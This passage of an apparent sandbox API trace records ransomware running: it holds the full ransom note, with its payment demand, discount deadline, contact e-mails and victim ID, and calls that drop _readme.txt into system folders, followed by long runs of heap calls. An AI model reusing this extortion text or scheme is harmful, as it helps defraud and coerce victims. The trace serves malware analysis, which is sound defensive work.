encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.645] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.645] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.646] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.646] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.646] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.646] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.646] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.652] RtlAllocateHeap 